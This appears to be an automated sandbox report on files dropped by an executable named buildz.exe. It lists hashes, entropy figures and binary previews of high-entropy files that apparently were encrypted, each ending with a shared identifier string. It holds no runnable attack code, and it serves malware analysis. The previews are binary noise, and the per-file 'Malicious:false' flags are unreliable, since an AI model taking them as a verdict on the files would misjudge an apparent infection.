                        Preview:<?xml@..Z......{....a....w;.Z'....J..n......f...NZ^......I..=..QP..&...X...`..]...P.F.&&....}.n9.....6Z....O...U.<d.;q6..(....c...F.&uc.`C%...$..ZW..@...!Md.BZ..........A<..u.,.~.9Q......(.^..\.....=A....y..H....tU.w,a..B...h.(-U%..l........._fh%..W.j.....w.aY".F......(v.`..G...=..:..w3.-..(k.x..Yk..).mY..+..]g.P.b...f..s...x.p....V.\K.r~...i.[y.@j.......x..).&.2.r.[.._L..v......B.7O_.S.fd)..4..i..._......A>z,.p:.bJ....{#.O....'.18mi.;..I#.x...5.b...u0P0h..c.X.V.M.:i\d.),v.X....2..E.....+..".R.......U..B..f.P`0.....4.............|..f_..~+.#...M.......5G.&g..%]....N..]...l5Y..Q...<.(8...S.\.......;..n.V.?..P../}g.y,,...D.~.....zr.F.....&...G...(.6.?>C+IOcI7.|....~F}.'..D..U..........|.b.@.....@.+.8`..)+.J...Q....j8J>..f..72....{..?.....]|.C=.1...8.....l.O..x......................2..v...B..\.?.}..:.=uY.N.>........D"a1-,*..WZc.....zpf.....*.Mm;0...qh..#...j...u_..u.G......."#2p`.<.a..)...+...;`.5'.....\.vg......z.A.V._......x.00G{`......]..u*Z-....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3675
                        Entropy (8bit):7.9502190705586955
                        Encrypted:false
                        SSDEEP:96:qYPkFSyvZ1uofQo0wXplLgVKoE+yiUO9kwf7r3fA:qYPcSyvZ1ZQJ2LgQoEFiU2l7rfA
                        MD5:8E9EBFAC924C97369BDC6A1C42247E68
                        SHA1:08853833CE1D03D9ED4396D0929CADA52DF32BC1
                        SHA-256:96793F6C89B31C320853F6BA64FB7B95CC8B842F5FDCAE0EF2C0AC7F50599872
                        SHA-512:5D7C52563BE4FA1047D2F4FD2A98B28946CA1967B27E68DCA716B0E89FE908F74D03CD9158628C24B7B411BA298A4A10FA6D661EB1307AF4BCA53D75C151B782
                        Malicious:false
                        Preview:<?xml...V...7.b....lU.g.M.Q....A@...aY....&p.?...*_R......m|U..I.pP.3\.e,....8lg"K.....s.u!....@....k1....~..PD......P.....z{+.....q.e.q....Z..1.!.......~7..+|^..&.I.E.AY......t/...Be......t_.S...I...%...B\'.&!C..9.r.........K.Hl.r.8.c..Y......=...U.....Q....q...6z}.s...M..l.9...]\Ri..7c..o..]..V>....m.....L....EBiK'.....F...j.....^..../...A.....m.#`..~....XR.M...Q.+...e...Lg.q..Z.."&!EI(.5..K.9T...0b...9.." w).@.p7^.R.._9.__.<.J..~.....[.f..V..F.q.".lK#.h.%...[)NT.K..&..r.[.9..,l....0..F..c...z.!..u.&.~w..e..t:.w.ow...C-S*...E5....h.e..4....^.S....3...05*0.....=4.R..}...0....}..L.0.7..mx.....C.Jl...X->peN.v....j.2..J~3U....=.N..D.Q-..".f....j...a.......Co.._.sO..!..D.7.{........u..=..*#Oi.....$B&w.#...g...bA......wB._&..P...U.R..(9.|..0...:..I.g.:.#m3~..cC./......2L]../...B.&....S.U!.ik...KO....... .A... ...>.}.......2...*.=1....S..U.f...H.W..U..r.E.!.m...u+/.-....Ad..._@F.t.{x..F^...dD.1.TJ8.LsX.i%s....U.....8.3w.t..aq.jZ.Q..".<Q.....7J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2924
                        Entropy (8bit):7.932607611180699
                        Encrypted:false
                        SSDEEP:48:1Es3xJ5+cvwYmsn0gU4aeCM/2dcgAQGhzhYB1YyGaeDgE99XMtY2rKw4ix1/UXMA:1Es3XIcwYmA0gDbd+dcOGhNYBeyXM2rw
                        MD5:BCEBAE3352CECFCB0F68F1FA17FC08FF
                        SHA1:88488C1DDBB79F2DE9284293F02EA885BD2A8301
                        SHA-256:69323F9BAD0BCF7F89C027B06527D3E84C9D3C169BA9543E5E3BBD14617995AC
                        SHA-512:EA229F3A092C00824B02135B133B297027B45A790C846638CAC38093DC69F8622196D0371D689CF10ABFC3434AFB5F78158647C0E2197E9A4C418B8D722CF754
                        Malicious:false
                        Preview:<?xml...D..zL!.m......o>...ST0..e......y..I.....{..V.K.v.V.....M.?....c...5....E......#f.Bo..?.Y.]9<....V..!J...p..5.0.&g...6..K.I.......3..o.G...r.s.b.Q!.L?y.......]...1..f...*x..V.*.VhT...0N..&<.0.V;..AE..G.y.....pK.....L..@.gG(..'...9.eZ.N.....T..n....6.f..[..56.N.......1M.....C.LU......s..\..6.mG.td.E.)2........1.[......A.r.?.lR.]...=....!q...Z.TUY...>.D!..o..!.i$Ok..m1..\...9isZ.2..L......Ej......zy.....4...$..^.p..*uLIk.*..^.>w.H..4...;f...u5.......,.F. .O.....|4....s.......v\.6......p....qp.?..Z...zB...Asdl.E.k..~.@..hu.F.un...+.....p..."M@...xA..B<.aa....=..ap..~k.o.e.......t...r1....!.%......h....%W.V...uM.....L?... ...gX6../<..@....0.}k....4]....d......lU...3.x9?.v...-.^.:z.<}..^.Q.......1 ...a.....L....%..E._}{;Z.......<.......2.. 4...9.`...V..jA.._.g..z.....0.....w..O.......<....j.uy..o.q.._pfR.2n..UV...;j.&U)..T...1t6kW.Gk..b.....C.??.....b2}....!...Gk1h."...G%!.eZ.)..I5.Y0c.!'.^.n....94.E.[.2...0.........nVv.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2461
                        Entropy (8bit):7.922697853559427
                        Encrypted:false
                        SSDEEP:48:MpQuWeXN56COPyVFiTmLJ9xoVX9AD1yfbQGabqCG3QfHnSu5HcMUD:IQiQZmL7+VywDVabqCGcHSCHcMA
                        MD5:2331FD7371528B9618DF471D8F8479D7
                        SHA1:0490E262CDA6A476D5C35A16404318CB970C8AFE
                        SHA-256:5EB4C18DE63D48E9757710953E3F8B36DD95C7DC1A700BA060C90238FE1262D8
                        SHA-512:3B41BCDBCE1A5FFEC0AD2392B2C8A09E98E06E6E06A154E0468D17C3BBB0385E0E8B8337759F069EC3CB6033E15F60F8D1422E93B198A7832630C1C437E5577C
                        Malicious:false
                        Preview:<?xml..."@qx.......Ci.>...7.&.w".(..J.P.R..HRv.?.^...lL...D,.<....'..v.0..I......E..}6...q.&.....5...a...aZ.g..O..x.v[;rq...U.r.:.?....*....Z.........f,.Ws.jb0D2.........%skD].(7.h.m.m..|.......Q...r....!B?....<._...+.eRo..X..M...=.&7p}.V....I.|.D.O....Nk...........yW..........p..e:.....E...+0...l......J4d......Nz.1.....d.|1.dB..>.....^..[H!.?I..pN#.4...Y}...'.8\.&...P..1.e.....N..i......G..g.NE..5.|...t.-.1...8Q.7.xt.d'.....8........+....&.R.$N....X..H.Q..\[.....P...nY-........Z..X.O.n.q.%.>o._.|+.Y@....S.K........$>....H..9....D.?...2........7y.Cr...c.x.k=.~........>.../.7....n...0'.LF..PzMD..J.v;.<@.............Q2>."S....dAlv.r.Q..$*c4f.L.u..`..8.c<^..e0.B.F.......9$.@^|`Hy.2}...Z.....,.......E.....Dd..PT. ...=t..8.7~Ush.....a..S.......Y....n........}.q..IK.Q......D.J....6.N..w......LO...(.3&I:.Ws....-.[.+......A.....&.......X...5..5.{r..%..Ux?.lfo....o+.E?.ZY........S....'..&ih.v.....F.O9.A......z...E...]..,.U.}..@.F..;.[..I.t.%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):758
                        Entropy (8bit):7.740920859727581
                        Encrypted:false
                        SSDEEP:12:GUwnlcORlPtxjLv261ewP81r79I3g+u7X7kCodRu+7JncTLLmZbAA56HUHIa4weB:vwl/R1t9Lhev1r79I3g+8wCodY+7JcTh
                        MD5:21A8C613EEEC7AB5591E50439451E12D
                        SHA1:2CCCA081371D5E9FD67AEE94E11D3DB4F355BACC
                        SHA-256:C11B014B592FDF996373B785F81A61A7848C8DCD254D57C48191AD698BF3D844
                        SHA-512:99FE7339C4B63F8D289A5767449A81B0137F6743A56425A1846698808D3CFC993354791A69D5604A736A439E2A2B8111015966C144FDDE4D71EB3E73BCED9063
                        Malicious:false
                        Preview:<?xml..M....]....`..U..Y4(...N.....c.o....s...K.=.{...p.%=B.0:.25."..F^S.(..c3.....%.M....c.1@..*..h[..W.t Ab..F...\...Y.Q.0..<.t.......9.|.....?9A.gh...$......+i_..)...@"....;..5.p..n-....|e.F..Hd........iE.)..\....s..:.)..r..H%|..=.u&....Se."T!Y.0......{..<.~h.XX.F.c.......=.L.t3.....z!..q"l..c0W...u.T.0..S..Z...>.8..o...6!p9.U:....a..R(......Z.....^jg>..+q..\O_....^.W~g.....dB..3..G.v.Gt.y....`h.W....v......v.....Av5A...(C......8.u..".kz..b^.C..L:M.E.Jr....b.dSr......(.....e.E..>.z.=\5.)}.....GnWFD.....`....42d`%..^E.K..m.....*.7.O....u..A...dp.-C..rt}.&O.....gE0./.j...R.em0'Tdw.Cs.b......Q...:....T.0...._. ...<'od<...#.......;].n.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1210
                        Entropy (8bit):7.843358630895016
                        Encrypted:false
                        SSDEEP:24:T1TRE7aoBp96uqLpnjV/2UwFauYZw3Y63X8mvfGbD:TKaoV6bxVuUwcuYSo6n3vfUD
                        MD5:97C32940D731FE3638C8787CA77FDBEE
                        SHA1:29B89322F6CF56BACB8DA017FAE21857DDBA1069
                        SHA-256:999695F6ACDFC007966C5F0C3A3A434C75CB2AD0E8F8C1B04BFF1C4AA1EBE70C
                        SHA-512:ACB84B3DB0E404C4FA588792A255302452C223E62B35AD9643AFCFAA74033555516164D9281CB69C80F3D12183D5AF77A5260CA4DFA032D6BFDCD669E038593E
                        Malicious:false
                        Preview:<?xml.rQ.R._. ....S*.l..x............y%9!,*p+ d..kn...v..J.4jK<.._b.A.BDwD....n...hTc.......m6B|V.F(...>.......yQ.-X.Q.J..VZ..s.a..o.Z...,M`...Q..^......wb.%..E7..d..F..%.Ez.$..........3%..^{.......M{..G.4...m..^p...."./.6:.Mp..&.j.. .....79.~H@..........0-~..J..^.a&.C. ..B.y...C..q.vY(l#/...y*.2..4(T!..r..m..[.J...8S{HZ..y..F.u..8...}.rP...)..)W.__.4}....:..F^.'a36........%|Z..Q...SG)....]..2.).....x..}z.m..Oa.;..C..).....b.G..Qf.Bz%....#e....I.F!..../.^..Z.B....h..7E..i.7.l...}%..~..#.....nFp....&...#...~..t.Y3GPK..O..L .v....h....y'Xr/tj]..blB.c.-Y-.{.ZF.+u.x.!..Y.|.R.S....W....T..o..... ...)TI.......)@.W$%....w..;^.....3a.....N.C.(.2X..(.CSo....V. .....e..y....b.w.8.D.).......pi.m....(y.5"......".U.y.;....EH.....;..;...S...o....Z'.V.J..O.....p.%6R:.....F...L.E.......B....d...`.`...N....+...DE..D`R.....h...0.+..]..l..b........1...Ou.....'.8,=..D..C...&.w3zL.?3..%1(#..@]g....-P.g.O.W........=?}.Z..~.....K.Q.0..7....0.H..F..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):537
                        Entropy (8bit):7.596105594785827
                        Encrypted:false
                        SSDEEP:12:U0102pqJ/ozqdzWnvyKrRJHgnkybLd7THgFt4nyNrEX26Gcii9a:TgJA+BEJ3ybLhorEvGbD
                        MD5:ABB861BE6BA2BC9695514DDDCA49AE30
                        SHA1:9CBE3124C716320E937DA50583A2CE2DAB5FA485
                        SHA-256:0D7295137B42B6C18068FFE74D195A361F25F0C9E1C1D49E726716210DDEB8B9
                        SHA-512:406D0616DC8E58D2D73CDEA40101C9BEE608D5950DCB9791A5820BCFD80C9C6E60BDFAF73DA85088AB09CFECC8DDB180659FA0DA2AF38ACAEA02D762177B5086
                        Malicious:false
                        Preview:<?xml).L....]..U.7.H.@_..-[..}C..t..$.T?[.!.-..A.w..V....5.IO].+..T#.l.\.f6..2..*...sh.y..uh.&:.:..v.M..{.i.|.x=+..<............7...n../.. n.....E.47Y...Z<.vj..!s.D.;...UQ?.$C..F.....b...C@f...).........*...a...|.U..3.h.Qq!.3.*E.l../..G5 ...(..... ..G...i..`:.T..YFS.^.<.G....s.,.N.......@...6..,..p......G..u\*.2,.k'J\/....T.....5.....T..T..`V"A.NJ...N..k....~......P.O...M.;DH.1.M.O..._.. ...K...7...'5.j.7S.....)Xq.."}....t..nNr...../..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2493
                        Entropy (8bit):7.922128344586071
                        Encrypted:false
                        SSDEEP:48:WzUpkiX6Pp/9XLMjX3UVXgahnzndpjk1/txFbUUD:Wwpkisp9iXkVnzndpjY/tx1UA
                        MD5:8C99C25B27AA73878387312C1FF3EC17
                        SHA1:43597C97A0A2C3B9F5582A62055C0BAAC8787866
                        SHA-256:AF93C88AE53A773D4DEB779D85BE0EB3F9CCA15DF0F947240FD18B8F9D9D9749
                        SHA-512:479EAB29E2BF09FB166D6BB8377FC831EE57486E39B9D38AE482B3D3675FB5DC6AB0CCE17966F659C9DA2C56E7B25A5B1FF06E6C503645D2B6F4D71197E09B88
                        Malicious:false
                        Preview:<?xml.Sg...Y..EX(.......@..#E..T.h.T40no..2..h....W.._.kRaP......w..J..J.....1.5.h.Dux..)...c..bU.g.f..:.8`.u6....=....r..k..`..!..i-./R....PvcH.Lt;.u+.e9_.F%.;a:$"..<..CI...E....m".P.....mi3..(S.(...3^....X:g.}..1.p1o......6...KQ>..^...j]........'-4u...b..}7.w.S..q.[...!..yp....CvG].dc.y.jo.Z-.z.D...hn@8o=.~{#....6.i.v.a..bQ.U]=.4....{.X.`....8&.V.G..C....*y.bz..s.....+[..Z..zt..l.A.0U........... ..J{t...........Ke&d%.c.pe.K..nd.....Y.'.t..fv..x.-.r.rBl|.~D...(.......(^R)8sF....$s..GEe,3.wH.W..o.....h.".*LhA........:.\c...nj....@.phq.H.|>`..@.Q.....iNha..DU...?...0f}.2..s\....Py...#Qa....R.6....!..w..'y.x.P....?.X...9-..._%...x...+..\..w.R..l.Q..D..........*q....|...l.W..Ue..(..~.....~......e..%....RL.w..)E2G........Aq...|.o..W../...bc..@....0.......n.m.}.[c.ni..'.T....ECV.]..#.VNF....y...h.,J C.....#..G!.Z.'.5\t...a.;....L.1....-....F....a7...../.?.T.....K....=["...J?..%..t.J.........<...}...OW...........O.....R}?M7.${.....S......5.E.p..M.b<
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):741
                        Entropy (8bit):7.667706081069169
                        Encrypted:false
                        SSDEEP:12:9Xc7JckQDfLf3axwYGWuYmJZd1xULN4pO0VBwjrxsgtTpefNGnKoR7LKcwGI26GX:94N+DmGWuY8Tza4XwjrxsgtTpQsnKk7N
                        MD5:DAA291791D3CC7FEF558AB9D20B6D9E4
                        SHA1:0D7AE23C480558E138C784098C1B57E60EFA0675
                        SHA-256:2E768DFE8EEE46B5A5D650F3FFA0702A79F7B8C0396E8D691BE64D1151A3E999
                        SHA-512:BED487978E1A938FC373675CA64C9651E6150D4238EB0786AA48F7CC5F43EB8D7CF00A9FB36BE6B529301BAD740BF1507052A7D0D78C5A2AC68DE6A80E9172CF
                        Malicious:false
                        Preview:<?xml...-..6H........c..m.u.._X.jk...`..-.V...aD.)V0.~p.`..../jW..g.R...../o..........!.A....L.#..`1.s..3.............%.X[...>3o..gs}.}......?.....d.{..~or.Q..v.7.}..s.t=%u.nD.L.<..o.....O,.F.[.>....9.-]T".:]\..8..V.M.n3.....F.g..my...Xv_.....<em.^....y.M.....AZ.5...4..G[......2.]qh.k..m".....C-3.B.<....@.e.%.4..90'@.pf.O..$)Dqh..7.....u.&HH.`2 .w...-.....A4jL.........p......t.!.....h'....7...aO.f.'Q,E...$Zz.!*....K:..:..q...B.G.OO\].A.s.&........u......./.2......;3......s.L.+..+.<.M,...ZwJ.C..@.q4.~Xi......QUG.g.|.=...`..c.L.q..S....L..u.C..b.1k....}..l.Q.......t.M.I.&.....1q.zO.*...q4...-.;.W..|....JM.CS..#c...0..Du."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.7123949770279685
                        Encrypted:false
                        SSDEEP:12:FurlOHfXL7B+ALGmubaFBRv969AnLOe9i6DRWvap7n8g7Elz26Gcii9a:ch4DlXnv9VX9cva6l7GbD
                        MD5:14CE6C08DAD09DF874B31A0527067E93
                        SHA1:4196E3E270E16261478BC2DEDD158688FF5D8D62
                        SHA-256:9B9D215012F5ED49B328B637B6E55285AD4C2363721DB80E2A0022000F5287AE
                        SHA-512:B94ED1E8DFB99FBEC04E8DB912F22E9445E55F2A0494ECBE7927DC6B6A565A4CDCA98D41F566DF7E0977A4089FD65C1455164B9E5A4A040C8ADE11A65F4F16A7
                        Malicious:false
                        Preview:<?xmlkp.;g.Vv....k..0E.z...\.w&......!.]..%.so../......4^B.M[..4 .....%..6$.Q.v...O.`.....Z..s....m.'..#..:.2..t;P.....u..E9.M,k...+.]/...;..TF....)...l...R.N....)|N.....|.?.3.\,..FY..!.B%..&.-.....f..C.U..K.r.......i...31.._......S...v.1...V.W.S...I.C.u\|_...rYK..m./y,N.4. .B.`A...>.(.....<.;...z.'.m=1B~,...M.....y..9E..L?.P...b.vd...=J...p.9.![.....{y.]+x.C`.=PV..J.....`...)...q.<<I...?.G....N.K.._l.B(.t.o.eE....z..At.....+....T<.|...|.s..Z4.N..%..h:N.D.'2t6.f(.."M...qr..5.@gq...WH.V9X7:.+/....>.@.#l..dF.P..~...].N...PW.-.N..}..m.fLoJ_..8?../.....9..:_;.i...p6...R,..Cn....".]<..`l.?..r3.Y.8.y.1.m.......{'.x}K...p}....!S.. ...S......8.....V......n_.....J........DQ...A.u..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):748
                        Entropy (8bit):7.708247127983828
                        Encrypted:false
                        SSDEEP:12:Mruwwd6zGCDKd5PgC5OstMXYKHoAQVe8eBwP/BfMBrF26Gcii9a:UJwdOGCDKbIsJgeAQVfK6/BfM5RGbD
                        MD5:C5B1FB43DDBCFA24C84765D3A7504F06
                        SHA1:CC7CA3308628F0B9CFA85B3D6C1EC224850BD338
                        SHA-256:C6FBE42D6BF524585E5EC2C2AD09533FEE5AD82BAEC3B7FD2D60287ABF062A0B
                        SHA-512:4D2EFD1BC6E997D81260CD4C49390057EE31E95697F33E1446D86B40B660A18E1221A25AEBCE9A2757F7C5E8EC4249A9C040EA2A274792471817C6C6EF9CEAF4
                        Malicious:false
                        Preview:<?xml1 ^i....wM....%..?.e...{WD..jH.<..a..x.......+..P...2,.m.fM\?.;S..h..d..6.An0......:.3.....w.La.#Y..^.S........9....V...k..l.Q.G...*n.BM&.F4f...s..Z....4..k......_..@..%'.Cn.......g....h..`(.sc.]tU.8...8."q.vg.J........hb:?{..gO~.Rbg.QbK|.D!*...9 ..7....Y.....b.<..-t...6.........}\..[..*=....u.....o"g...-^b*..ie....e..b...A.V....&g..1w;_>.6C73..-..,..r.r......,..E..../16... .k%.....Ie..I...as`..... ...B=.B.....Y....6E.6.m.X..J.e..T."....\1.'Yx....p....)..rz.o..{....y.....ml..b...<.-.3z..E=H...9..E..)....%\+Uk.j .G...m2.......r..is.a..^hO.6w...,..:(H.6....D.q..7./......v.3.;.......Q.e...g.!#.5^..E+= .yaF.TY@..5.T.P.7OS3.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.641049984557171
                        Encrypted:false
                        SSDEEP:24:Qcl/Ss2+zuzFee7MS/A/9TQhuo0mWtRGbD:Qcl/S3+wNQq90TUD
                        MD5:5821C673B27DC86FDA9AECC5B9B51999
                        SHA1:2FBA3EF8A8189B2BB0F32CD70C0C3394AF1620EE
                        SHA-256:1E76B0E0474594DDF7913A24C6E9471003AF4FDCC92A51259B9BA42382E2AC74
                        SHA-512:0D564A196DBBE0413FFC7C32B3D633A7533639E48C60E69C4A5B965632ACE8109D7511096269B0CDB8D4E5F69233655CB67D2966E0035B996674948710B714AE
                        Malicious:false
                        Preview:<?xml-wT.Z9`.....&......@C0...*M..{LJ=.WP-...H.v.:.p1....3.|.=_w...e.P.....|....t.p{...|..,.5"?.V.c....^.B....Q.../........D0.B..lT.L..K[EHB.....k....~9H..2..vg...N:....>.......o...*$.'E.E.R=[z.<.d..9.a=/.....d.....W.0.^1,q..s.Q8......Na.:&.D.Y|.5........$b..EEU.@qK...l...8.``._.k...2=...Wm..........""n1.H;.Z...Z.].f.o&.A.#..W......QB....3i& .V.O.{......Bj.T....*m.1"E../h.IA.}..Lw....]...)....U.c.Zo.8..?Vs.....:.i...>[Y@...$\{B....-%./.A..JX.Z.o<.mz...?.....H..^b.l.V.B.Y]j.0.Q...Z...!..,...!..z*.zer.PV..9d;~..c.l.........!@%.{..g,....C#\.....y6..x(A-.D1..$d9`:#.CtH{...kTr.....R.x=5.v.9.X\.#o...I.6..=km.p.NT...Ls.....P.\.KU...OL.0...4".R.. .J{.n.\.1t......k...M.tU....6....,jH..r...;w..m.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):965
                        Entropy (8bit):7.7489731880618535
                        Encrypted:false
                        SSDEEP:12:QRxc7fdnNrye3mrU6zkLFG+/UrUfTKQB8pLHeY5bEnDzTNVV40ceZERflMc9F+5C:BpNrZxp/jRA3aNVmBRfl5+5AqWaGbD
                        MD5:54E52A22E835696259F1781261B29251
                        SHA1:5B9FE2BF54BF44702664DBEBF80270B35F646F0F
                        SHA-256:2D44A8ABE8B1E63295D3C3AFCC1F8513D18CEC9861D01A363B87BFE7D1C4E54E
                        SHA-512:A80A6BA58B72C5A844ED71CE51E728A456E973625AC90EAD15698F1877B94A818E9096DED611555577F162A2339C37370779CDBC38D12949E8713E26BDB778F4
                        Malicious:false
                        Preview:<?xml...5VKY..i..9px..Zb.....@k....L..4k*...}..qs..V:.~.Z..SC.*..k....K..i.j...T......ND..eV...m...vI.l...V..[.*.....o.GZg_...7.v..v.9...6..<.3cO..c...8Mk.$..(.K.0.9.G.gNj.<...8eQs.u(...:....2...N.mGB..V...%.w.cs..!;..G..'...._.x2..{{.../|%8-._v...}.Y..=^.....I..ye....A..7..E..B.>...kP..-].P.......!.c'..7X..a(....C...$\'........*z...Pt.6....ef.58.e.f"L.}d..T...q.o.6Il.....]..=*.%G.P.p.....g.Ez}...r..*...m...|..t..!...B..]X..-.M.x...........B.&b4.........y.NG#.].c*..`..a...a..e..kaVO'..!.'...o......A...,..Q....^XO...V.!.0..N. z.E0Le.C..9.$t.7...uB....t...3d......J....#LQ...La.s\.n..`&..6..'.....yxF.|n.}.J,....n..].B...i..i.....{......KK..L;.........."..Hadwlc..H5..@.....E....K"?..)...-.D9......... s.'.tb....B/."...G.C...T...*~.. Cdu.ju.f{A}..o.(.!.e..:WZ./..i...;.m[.'..<..^........._.........uu....0.AY,...H....9.E.pZ..O4:e_...{..g.*.iEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):800
                        Entropy (8bit):7.731998352563796
                        Encrypted:false
                        SSDEEP:24:BnHchM1ZarFgOnWDUBwLWPPGAFWYJYn0su8GbD:6hphgMPGJY6zUD
                        MD5:4ACBA3611228DBB7DF0D59C9D4C8D0FB
                        SHA1:97F2B7F882936331F45F8DBE30FD961DE3BB54F2
                        SHA-256:0530FBA6A41BD789A6CB24D94EDDDD9D6DF1EAD7D6D4D5FE6E89DD0EE50E1027
                        SHA-512:FB591980A78C78E4766F5EFA8FA8887F1766CC2244743A5F53FE031E8342EC56B530C5FA5778E4D5A7F3BC81F5D502DE7E883324EE72762AA4154853769CB152
                        Malicious:false
                        Preview:<?xml.E...?s..wx..N.(C.x ..l.......`5.K*?./. 7.,...V.j..>..=.....R..^]...v..g^.{..o.#w.X.?...L......i.......I.f...'.Y..0#bP.G.Q..).f.._I.%+.........H..bVl._....K.._$F..,......)7.%.2. -..M=.W./K&"..%.`...d4....+RQ.z...Y.{.ic..S..W......9.,/-f.v..f........y......l.;.....N.G`.!..5C.A..2..)z6}.....ePr*.I-RL.A\..=vy....X..".#.K.1c..^.*...$..(..F...P.._...jO...W..50.c{....s..n....%7..$3.Y.9....3.(P. .Hx3.. ..c=.....|.I.d.^e.]v....>....X.&.jI7.A...Wx]k.. .}...Q...2&...w......*...#.M`....:.y...k...'.7...^.wIH.OcY.>j$L.Q...o.'.\Dr.....Z..c......r.a.e.5ti..>YrB..Y.......l.Z...&....%...:..Df..q..hE..]...0W...d.P...........+..-.../.p..%....4}eJ_'$...&;....Tof......8s"....6..?..$&&..e..O...!....[EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.683686046058949
                        Encrypted:false
                        SSDEEP:12:Cv+VzopHs1zU/yjRAS17p+moFP+8ZNPJvDNyZ36KHRRvi+H26Gcii9a:Cv+17zUYRA6YFPjPJrNyZjV5/GbD
                        MD5:54C2FAA463A21341068C4B94BBBDA8FB
                        SHA1:B6B36FFA1A9B2F69E3A48ED6CC13BB155E23F9A2
                        SHA-256:2CD5861F8D52B4C56E3B380FC565A5B0A08C7FA1CDEB61F9FE691F8A87CC8256
                        SHA-512:E0A795D23C3CCAA798DEAA9D4C47D30A62232F88E5BA8DFB0D646D7294C209F7BB935BBD6451CD645BFDB6266291CA1DF7501146C1FF78A8923B2776FCE5DAE5
                        Malicious:false
                        Preview:<?xml..`.X\rr...:......j..d.7 R....m.,...D../.]..K.-(.....-......i/.M.L...-%E......5.t.C.........k8/.'.Shc.(%...;2L<....<.]}q.er...Z.f......c.p.]...r. ...n..q.....q.x..t^.cf.3.a...)3..,...A.4.:..]..Q.H...y$|..;....{66..BRW.1.."XqE.C....~....+.. ...S....=J1.t.8..<...x.TL..T....f4.c7.#.ga.9...K..7....@%....u.N...Q....C...9I.<~F...."hj{..+..o..........0.<....xu.z@%..!..=.?/.p...[..!..z=..V...z.i\..a...Z. D..>......96_u./..T t.C....a./4"WG.....~...'R.]....}..]....03..F..!...l......]..'fn.'1...T....-_e....YOY\_`z...u.....Q.;...G..w....,.....K....I.?...\.....6..4...#2.r...Z.d.._..S.$.....9].,...$;..F3...X...v....X..q..<)..4_\.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.770770822941754
                        Encrypted:false
                        SSDEEP:12:V9qo3Cdo5JKUcYAUKNVoQNnLfM09ej5kPRS6NaFXRBYKplaOKoVzNhS+g26Gciik:L0dKKUcnoWM09eFgA6NaHEtoeGbD
                        MD5:D8B1CD0346BBCBB4CC1E797FA13306B5
                        SHA1:EFCD8EA3681212454FB82D7BA8F26F65A593E529
                        SHA-256:402BC7AFFB73EACEBA7450430AA0C39233E6F89625AB62E1687A1F862EE86253
                        SHA-512:637252EAF7B9652E61C3E60D63778FDD4152C88A7E02CC6271AF8DDEF1394882A98C0DE604631D948B3C737CC9CF5F45D0091909E42DFD980898595FC69FF8E4
                        Malicious:false
                        Preview:<?xml.V.5Q.;...R.XV.Z..T..&..v.u.!.b.;.K+.E..8@.....X...+uL..R".q...s...$...i.....?_....:.9/tF8.T.nB.....#8.7.NL.yb..8...1r.mt..j......~m`..,.Bp.]R.#.....g...m....8.B...c.......'x..L..*...$.hY+...k....:.....X-"..|U%.i..g}...)........5...9..\....|.W....(.h?[=.....Q..._...=.Iy..'....Tz..*.n*..3..PPr....y......B. ......=!.....6A...c..2N..!._.../rI%.I.....Z.k...qe.=.F..L..B.]....-IU...Z.[..x.O,.i6.e.v....Y+......>....\sT..... .z..B.Z..2..A.87Q1l.............{('......V.lv...\...{~=...U.j.w...ESt..r....16...7.X.0.{(r.sq.J.d..![6I.Q.}..&\.&u...A.3..P../.\.U.ca=.:.`...6N...MO..M.co...X/...!...o..~. m.l..V.2....P...)......x.4..">2.W..:.h.._...5...<$#......).......[....Mxh.aB..F......N.... ..j......Qr.*EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.68807942414769
                        Encrypted:false
